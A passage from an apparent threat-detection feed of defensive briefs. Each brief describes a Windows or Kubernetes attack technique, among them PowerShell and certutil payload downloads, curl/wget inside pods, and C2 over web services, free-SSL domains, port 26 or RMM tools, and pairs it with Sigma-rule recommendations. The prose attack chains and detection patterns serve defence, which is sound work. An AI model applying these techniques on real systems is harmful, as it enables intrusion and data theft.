files (.chm) to deliver malicious payloads, bypass security controls, and gain initial access via social engineering.","title":"Network Connection via Compiled HTML 
File","url":"https://feed.craftedsignal.io/briefs/2024-01-hh-exe-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["PowerShell"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","file-download","powershell","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers frequently use PowerShell, a legitimate administration tool, to download malicious payloads into compromised systems. This technique allows them to bypass traditional security measures by leveraging a trusted tool. This activity often occurs during the command and control phase, where attackers introduce additional tooling or malware for further exploitation. This rule identifies instances where PowerShell downloads executable and script files from untrusted remote destinations. It does this by correlating network and file events, specifically looking for PowerShell processes initiating network connections to non-whitelisted domains followed by the creation of executable or script files. 
The rule helps defenders identify and respond to potential command and control activity and malware deployment attempts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system, possibly through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell (powershell.exe, pwsh.exe, or powershell_ise.exe) to initiate a network connection to a remote domain.\u003c/li\u003e\n\u003cli\u003eThe DNS request is made to a domain not in the allowed list (e.g., not *.microsoft.com, *.azureedge.net, etc.).\u003c/li\u003e\n\u003cli\u003ePowerShell downloads a file with an executable extension (e.g., .exe, .dll, .ps1, .bat) or a file with a MZ header.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk.\u003c/li\u003e\n\u003cli\u003eThe file is saved to a location that is not excluded by the rule, filtering out commonly used temporary directories.\u003c/li\u003e\n\u003cli\u003eThe downloaded executable or script is then executed, leading to further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence, lateral movement, or data exfiltration depending on the downloaded payload.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the introduction of malware, backdoors, or other malicious tools into the compromised system. This can enable attackers to perform a wide range of malicious activities, including data theft, system compromise, and further propagation within the network. 
The compromised system can become a beachhead for further attacks, potentially impacting numerous systems and leading to significant financial and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003ePowerShell Remote File Download\u003c/code\u003e to detect PowerShell processes downloading executable files from untrusted remote destinations by correlating network and file creation events.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend to provide the necessary network and file event data for the rule to function correctly as noted in the \u003ca href=\"https://ela.st/install-elastic-defend\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent process of the PowerShell process, the reputation of the downloaded file, and any other suspicious activities on the affected host, as per the investigation guide in the rule\u0026rsquo;s \u003ccode\u003enote\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eReview and customize the whitelisted domains in the Sigma rule to match your organization\u0026rsquo;s specific environment and trusted external resources, as described in the \u003ccode\u003equery\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eBlock the identified malicious domains or IP addresses at the network perimeter to prevent further downloads.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:25:00Z","date_published":"2024-01-03T15:25:00Z","id":"/briefs/2024-01-remote-file-download-powershell/","summary":"Detects PowerShell being used to download executable files from untrusted remote destinations, a common technique for attackers to introduce tooling or malware into a compromised environment.","title":"Remote File Download via 
PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-file-download-powershell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","OneDrive","Chrome","Opera","Fiddler","PowerToys","Vivaldi","Zen Browser","WaveBrowser","MicrosoftEdgeCP"],"_cs_severities":["low"],"_cs_tags":["command-and-control","webservice","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Google","BraveSoftware","Opera","Vivaldi","Wavesor Software","Discord","Telegram","Facebook","Trello","GitHub","Supabase"],"content_html":"\u003cp\u003eThis detection rule, sourced from Elastic, identifies potential command and control (C2) activity by detecting connections to commonly abused web services. Adversaries often leverage popular web services like pastebin, GitHub, Dropbox, and Discord to mask malicious communications within legitimate network traffic. This technique makes it challenging for defenders to distinguish between normal user activity and malicious C2 traffic. The rule focuses on Windows systems and monitors DNS queries to identify processes communicating with a predefined list of services known to be abused by attackers. The rule was last updated on 2026-05-04 and is designed to work with data from Elastic Defend and SentinelOne Cloud Funnel. 
The goal is to identify anomalous network connections originating from unusual processes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user on a Windows host unknowingly executes a malicious file (e.g., via phishing or drive-by download).\u003c/li\u003e\n\u003cli\u003eThe malicious file executes a process outside of typical program directories (e.g., \u003ccode\u003eC:\\Windows\\Temp\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThis process initiates a DNS query to a domain associated with a commonly abused web service (e.g., \u003ccode\u003epastebin.com\u003c/code\u003e, \u003ccode\u003egithubusercontent.com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe DNS query resolves to an IP address, and a network connection is established to the web service.\u003c/li\u003e\n\u003cli\u003eThe malicious process uploads or downloads data from the web service, potentially containing commands for the compromised host or exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe web service acts as an intermediary, relaying commands from the attacker to the compromised host or exfiltrated data from the compromised host to the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to perform further actions on the compromised host, such as lateral movement or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack using common web services for C2 can lead to data exfiltration, system compromise, and further propagation within the network. The low severity suggests a focus on detecting early-stage C2 activity, which if left unchecked, could escalate into a significant incident. 
The usage of popular web services makes detection difficult, requiring careful analysis and tuning to avoid false positives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Connection to Commonly Abused Web Services\u0026rdquo; to your SIEM and tune it for your environment to minimize false positives.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon DNS query logging to accurately capture DNS requests for improved detection capabilities, activating the \u0026ldquo;DNS Query to Commonly Abused Web Services\u0026rdquo; rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, focusing on the process execution chain and network connections to determine the legitimacy of the activity, referencing the investigation steps described in the rule documentation.\u003c/li\u003e\n\u003cli\u003eReview and update the list of excluded processes in the Sigma rule to reflect your organization\u0026rsquo;s approved software and reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-common-web-services-c2/","summary":"This rule detects command and control (C2) communications that use common web services to hide malicious activity on Windows hosts by identifying network connections to commonly abused web services from processes outside of known legitimate program locations, indicating potential exfiltration or C2 activity blended with legitimate traffic.","title":"Detection of Command and Control Activity via Common Web 
Services","url":"https://feed.craftedsignal.io/briefs/2024-01-common-web-services-c2/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2019-0708"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["command-and-control","lateral-movement","initial-access","rdp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eRemote Desktop Protocol (RDP) is a common tool for system administrators to remotely manage systems; however, exposing RDP directly to the internet creates a significant attack surface. Threat actors frequently target and exploit RDP for initial access, lateral movement, and establishing backdoors within compromised networks. This activity is detected by monitoring network traffic for RDP connections originating from outside the internal network (i.e., from source addresses outside the RFC1918 IP ranges). This is important because successful RDP compromise often leads to broader network infiltration and data exfiltration. This detection focuses on the network-level characteristics of RDP connections from the internet to internal assets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a publicly accessible RDP service.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to brute-force RDP login credentials or exploits a known RDP vulnerability (e.g. 
BlueKeep CVE-2019-0708).\u003c/li\u003e\n\u003cli\u003eUpon successful authentication or exploitation, the attacker gains remote access to the targeted system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system as a pivot point to perform reconnaissance on the internal network.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally within the network using stolen credentials or by exploiting other vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware or establishes persistence mechanisms (e.g., creating new user accounts or modifying system configurations).\u003c/li\u003e\n\u003cli\u003eThe attacker gathers sensitive data from internal systems.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the stolen data to an external server or deploys ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised RDP services can lead to significant data breaches, system downtime, and financial losses. Attackers can leverage RDP access to steal sensitive information, install ransomware, or disrupt critical business operations. While the number of affected organizations varies, RDP exploitation remains a prevalent attack vector, especially for organizations with inadequate security practices. The impact of a successful RDP attack ranges from several thousands to millions of dollars, depending on the size of the organization and the sensitivity of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;RDP (Remote Desktop Protocol) from the Internet\u0026rdquo; Sigma rule to your SIEM to detect unauthorized RDP connections from outside the network.\u003c/li\u003e\n\u003cli\u003eReview firewall rules and network configurations to ensure RDP services are not exposed directly to the internet. 
Implement a VPN or RDP gateway for secure remote access.\u003c/li\u003e\n\u003cli\u003eEnable and monitor network traffic logs (category: \u003ccode\u003enetwork_traffic\u003c/code\u003e, product: \u003ccode\u003ewindows|linux|macos\u003c/code\u003e) to provide data for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the source IP address and user accounts involved in the RDP connection.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the blast radius of a potential RDP compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-rdp-internet/","summary":"This rule detects network events indicative of RDP traffic originating from the internet, which poses a significant security risk due to its frequent exploitation as an initial access or backdoor vector.","title":"RDP (Remote Desktop Protocol) from the Internet","url":"https://feed.craftedsignal.io/briefs/2024-01-rdp-internet/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["kubernetes"],"_cs_severities":["high"],"_cs_tags":["kubernetes","execution","command and control","threat detection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious activity within Kubernetes environments where attackers leverage \u003ccode\u003ekubectl exec\u003c/code\u003e or similar API calls to execute commands within pods. Specifically, it focuses on instances where these commands involve using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to retrieve content over HTTPS. Attackers may use this technique to download malicious scripts, tools, or exfiltrate sensitive data from compromised pods. 
This activity is flagged based on decoded request URIs from Kubernetes audit logs, reconstructed command strings, and filtering of benign traffic related to cluster health checks and OIDC/JWKS endpoints. The rule aims to detect anomalous behavior that deviates from typical pod execution patterns, helping defenders identify potential intrusions or misuse of pod execution privileges. The rule was created on 2026/04/23 and last updated on 2026/04/23 according to the source.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to the Kubernetes cluster, possibly through compromised credentials or a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target pod in the cluster in which to execute commands.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or a similar API call to initiate a shell session within the target pod.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a command using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download a malicious script or tool, or to exfiltrate data, over HTTPS. 
The URL is often encoded in the requestURI.\u003c/li\u003e\n\u003cli\u003eThe Kubernetes API server records the exec call and its parameters in the audit logs.\u003c/li\u003e\n\u003cli\u003eThe detection rule decodes the requestURI, extracts the command string, and identifies the use of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e with an HTTPS URL.\u003c/li\u003e\n\u003cli\u003eThe rule filters out known benign URLs associated with cluster health checks or OIDC/JWKS endpoints.\u003c/li\u003e\n\u003cli\u003eIf the command is identified as malicious, an alert is triggered, indicating a potential compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the deployment of malicious tools within the Kubernetes environment, potentially enabling lateral movement, data theft, or denial-of-service attacks. Compromised pods could expose sensitive data or be used as a launchpad for further attacks on the cluster or other systems. 
The scope of impact depends on the permissions granted to the compromised pod and the attacker\u0026rsquo;s objectives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Kubernetes Pod Exec with Curl or Wget to HTTPS\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eReview Kubernetes RoleBindings for \u003ccode\u003epods/exec\u003c/code\u003e to ensure only required principals retain access on sensitive namespaces.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by reviewing the decoded URI and reconstructed command in the alert details.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict egress traffic from pods, limiting the potential for data exfiltration via HTTPS.\u003c/li\u003e\n\u003cli\u003eRegularly audit Kubernetes audit logs for suspicious activity related to pod execution and API calls.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:27:00Z","date_published":"2024-01-03T14:27:00Z","id":"/briefs/2024-01-kubernetes-pod-exec/","summary":"This rule detects Kubernetes pod exec API calls using curl or wget to fetch HTTPS URLs, potentially indicating malicious activity such as staging tools or exfiltrating data.","title":"Kubernetes Pod Exec with Curl or Wget to HTTPS","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThe detection rule identifies unusual instances of dllhost.exe making outbound network connections, which may indicate adversarial command and control activity. 
Dllhost.exe is a legitimate Windows process used to host DLL services. Adversaries may exploit it for stealthy command and control by initiating unauthorized network connections to non-local IPs. This approach helps in identifying potential threats by focusing on unusual network behaviors associated with this process. The rule aims to detect activity related to defense evasion, where adversaries use system binaries to proxy execution. The detection logic relies on identifying dllhost.exe processes initiating network connections to destinations outside of commonly used private IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., via phishing or exploitation).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a malicious DLL file on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses dllhost.exe to host and execute the malicious DLL.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL initiates a network connection to an external IP address, bypassing traditional process-based network monitoring.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a command and control (C2) channel via the dllhost.exe process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands and receive data from the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data from the compromised network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the establishment of a covert command and control channel, allowing attackers to remotely control the compromised system. This can result in data theft, further compromise of the network, and potential financial loss. 
The references point to APT29 activity, suggesting sophisticated actors may leverage this technique.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation (Event ID 1) and network connection (Event ID 3) logging to enhance visibility of process execution and network activity (\u003ca href=\"https://ela.st/sysmon-event-1-setup\"\u003ehttps://ela.st/sysmon-event-1-setup\u003c/a\u003e, \u003ca href=\"https://ela.st/sysmon-event-3-setup\"\u003ehttps://ela.st/sysmon-event-3-setup\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eUnusual Network Connection via DllHost\u003c/code\u003e to your SIEM to detect suspicious outbound connections from dllhost.exe.\u003c/li\u003e\n\u003cli\u003eInvestigate and whitelist legitimate software updates or enterprise applications that use dllhost.exe for network communications to reduce false positives, as described in the rule\u0026rsquo;s analysis notes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-unusual-dllhost-network-connection/","summary":"The rule identifies unusual instances of dllhost.exe making outbound network connections to non-local IPs, which may indicate adversarial Command and Control activity and defense evasion.","title":"Unusual Network Connection via DllHost","url":"https://feed.craftedsignal.io/briefs/2024-01-unusual-dllhost-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","credential-access","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eCertUtil is a command-line utility included with Windows, designed for managing digital certificates and certificate services. 
Attackers frequently abuse it to \u0026ldquo;live off the land\u0026rdquo; by downloading malware, deobfuscating files, and establishing command and control channels within compromised environments. This activity leverages certutil.exe to perform actions typically associated with malicious payloads, blending in with legitimate system activity and evading traditional security measures. The tool\u0026rsquo;s capability to encode, decode, and retrieve files from URLs makes it a versatile asset for attackers aiming to maintain a low profile while executing malicious operations. This detection focuses on identifying specific command-line arguments indicative of this abuse, such as those used for encoding, decoding, and URL retrieval.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access through an undisclosed means (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eThe attacker executes certutil.exe via cmd.exe or PowerShell.\u003c/li\u003e\n\u003cli\u003eCertutil is used with the \u003ccode\u003eurlcache\u003c/code\u003e parameter to download a malicious payload from a remote server.\u003c/li\u003e\n\u003cli\u003eCertutil uses the \u003ccode\u003edecode\u003c/code\u003e parameter to decode a base64-encoded payload, saving it to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker uses certutil with \u003ccode\u003eencodehex\u003c/code\u003e to encode a binary into a hexadecimal representation to evade signature-based detection.\u003c/li\u003e\n\u003cli\u003eThe attacker then uses certutil with \u003ccode\u003edecodehex\u003c/code\u003e to decode the hexadecimal encoded data.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the decoded payload, gaining further control of the system.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a command and control channel, using certutil to encode/decode communications.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to download and execute arbitrary code, bypass security measures, and maintain persistence within the compromised system. This can lead to data exfiltration, system compromise, and further propagation of the attack within the network. The lack of directly observed IOCs in the originating advisory limits quantification of victim count and impact scope, but the technique is widely applicable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious CertUtil Usage for Encoding/Decoding\u0026rdquo; to detect abuse of encoding/decoding functions within certutil.exe, focusing on unusual file types or destinations.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious CertUtil URL Download\u0026rdquo; to identify certutil.exe being used to download files from URLs, and tune the rule based on known good software deployment practices.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to ensure the rules above function correctly by capturing command-line arguments (as referenced in the logsource for each rule).\u003c/li\u003e\n\u003cli\u003eReview historical process execution logs for instances of certutil.exe using suspicious parameters like \u003ccode\u003edecode\u003c/code\u003e, \u003ccode\u003eencode\u003c/code\u003e, \u003ccode\u003eurlcache\u003c/code\u003e, \u003ccode\u003everifyctl\u003c/code\u003e, \u003ccode\u003eencodehex\u003c/code\u003e, \u003ccode\u003edecodehex\u003c/code\u003e, or \u003ccode\u003eexportPFX\u003c/code\u003e to identify potentially compromised systems.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-suspicious-certutil/","summary":"Attackers abuse certutil.exe, a native Windows utility, to download/deobfuscate malware for 
command and control or data exfiltration, evading defenses.","title":"Suspicious CertUtil Commands Used for Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-certutil/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MicrosoftEdge"],"_cs_severities":["low"],"_cs_tags":["command-and-control","encrypted-channel","freessl"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies Windows processes communicating with domains using free SSL certificates from providers like Let\u0026rsquo;s Encrypt, SSLforFree, ZeroSSL, and FreeSSL. Attackers can leverage these certificates to encrypt command and control (C2) communications, blending malicious traffic with legitimate encrypted web traffic. The rule focuses on detecting unusual processes, specifically those originating from standard Windows system paths that would not typically establish connections to services using free SSL certificates. This excludes known benign processes to reduce false positives and highlight potentially malicious C2 activity. 
This rule was published on 2020/11/04 and last updated on 2026/05/04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises a Windows host.\u003c/li\u003e\n\u003cli\u003eThe attacker installs a malicious agent on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe agent is configured to use a domain that utilizes a free SSL certificate for C2 communication.\u003c/li\u003e\n\u003cli\u003eThe malicious agent establishes a DNS connection to a domain ending in *.letsencrypt.org, *.sslforfree.com, *.zerossl.com, or *.freessl.org.\u003c/li\u003e\n\u003cli\u003eThe infected host bypasses host-based firewalls, as the traffic is encrypted.\u003c/li\u003e\n\u003cli\u003eThe agent receives commands from the C2 server over the encrypted channel.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands to perform lateral movement or data exfiltration.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data from the compromised host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could lead to undetected command and control activity within the network. Attackers could use this encrypted channel to exfiltrate sensitive data, deploy ransomware, or move laterally to other systems. Due to the use of free SSL certificates, the traffic appears legitimate and can bypass basic network security controls. 
While the rule severity is low, a successful C2 channel can lead to critical impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect potentially malicious processes using free SSL certificates for communication, tuning the false positives for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on processes not typically associated with network activity originating from the defined Windows system paths.\u003c/li\u003e\n\u003cli\u003eMonitor DNS query logs for connections to domains using free SSL certificates from unusual or untrusted processes.\u003c/li\u003e\n\u003cli\u003eUpdate the Sigma rule with new free SSL certificate providers and adjust the excluded processes based on observed false positives in your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 22 (DNS Query) logging for better visibility into DNS requests.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-freesslcert-c2/","summary":"This rule identifies unusual Windows processes connecting to domains using known free SSL certificates such as Let's Encrypt, which adversaries may use to conceal command and control traffic.","title":"Unusual Windows Processes Connecting to Domains Using Free SSL Certificates","url":"https://feed.craftedsignal.io/briefs/2024-01-freesslcert-c2/"},{"_cs_actors":["BadPatch"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["command-and-control","exfiltration","network-traffic"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection rule identifies suspicious SMTP activity occurring over TCP port 26. While standard SMTP traffic typically uses port 25, port 26 is sometimes used as an alternative to avoid conflicts or restrictions. 
The BadPatch malware family has been known to leverage port 26 for command and control (C2) communications with compromised Windows systems. This activity is considered suspicious because legitimate uses of SMTP on port 26 are less common and can indicate malicious activity, such as covert C2 channels used by malware like BadPatch. The rule analyzes network traffic to detect SMTP communication occurring on this non-standard port, helping to identify potential infections or unauthorized network activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial infection occurs via an unspecified method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eMalware establishes a foothold on the compromised system.\u003c/li\u003e\n\u003cli\u003eMalware configures itself to use SMTP on port 26 for C2 communications.\u003c/li\u003e\n\u003cli\u003eThe infected host initiates a TCP connection to a remote server on port 26.\u003c/li\u003e\n\u003cli\u003eThe malware sends commands to the infected host over the SMTP connection on port 26.\u003c/li\u003e\n\u003cli\u003eThe infected host executes the received commands.\u003c/li\u003e\n\u003cli\u003eThe malware may exfiltrate data to the remote server over the SMTP connection on port 26.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems may be remotely controlled by attackers, leading to data theft, malware propagation, or further malicious activities. The use of non-standard ports like 26 can help attackers evade detection. 
If successful, an attacker can maintain persistence and control over the compromised system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SMTP Traffic on TCP Port 26\u003c/code\u003e to your SIEM and tune for your environment to detect potential command and control activity.\u003c/li\u003e\n\u003cli\u003eInvestigate any network connections on TCP port 26 to identify potentially malicious SMTP traffic.\u003c/li\u003e\n\u003cli\u003eReview network traffic logs focusing on \u003ccode\u003enetwork_traffic.flow\u003c/code\u003e or \u003ccode\u003ezeek.smtp\u003c/code\u003e events to detect unusual patterns associated with TCP port 26.\u003c/li\u003e\n\u003cli\u003eImplement firewall rules to block unauthorized SMTP traffic on port 26.\u003c/li\u003e\n\u003cli\u003eExamine source and destination IP addresses of traffic on port 26, and correlate with threat intelligence sources to identify known malicious actors as per the references.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-smtp-port-26/","summary":"This rule detects SMTP traffic on TCP port 26, an alternative to the standard port 25 that the BadPatch malware family has used for command and control of Windows systems.","title":"Suspicious SMTP Activity on Port 26/TCP","url":"https://feed.craftedsignal.io/briefs/2024-01-03-smtp-port-26/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Endpoint","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","remote-access","windows"],"_cs_type":"advisory","_cs_vendors":["TeamViewer","LogMeIn","AnyDesk","ScreenConnect","ConnectWise","Splashtop","Zoho","RustDesk","n-able","Kaseya","BeyondTrust","Tailscale","JumpCloud","VNC","Datto","Auvik","SyncroMSP","Pulseway","NinjaOne","Liongard","Naverisk","Panorama9","Tactical 
RMM","MeshCentral","ISL Online","Goverlan","Iperius","Remotix","Mikogo","Action1","Elastic"],"content_html":"\u003cp\u003eThis detection identifies DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains originating from processes that are not web browsers. This activity can indicate the use of legitimate RMM tools for malicious purposes, such as command and control, persistence, or lateral movement within a network. The detection aims to surface RMM clients, scripts, or other non-browser activities contacting these services without legitimate user interaction. Defenders should investigate processes making these queries to confirm expected behavior and validate the security posture of their managed assets. The rule is based on a list of known RMM domains and excludes common browser processes to reduce false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows host through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys or leverages an existing RMM tool on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe RMM tool, running as a non-browser process, initiates a DNS query to resolve a command and control server associated with the RMM service (e.g., teamviewer.com).\u003c/li\u003e\n\u003cli\u003eThe DNS query is made by a process other than a known web browser (chrome.exe, firefox.exe, etc.).\u003c/li\u003e\n\u003cli\u003eThe compromised host establishes a connection to the resolved IP address associated with the RMM domain.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool to execute 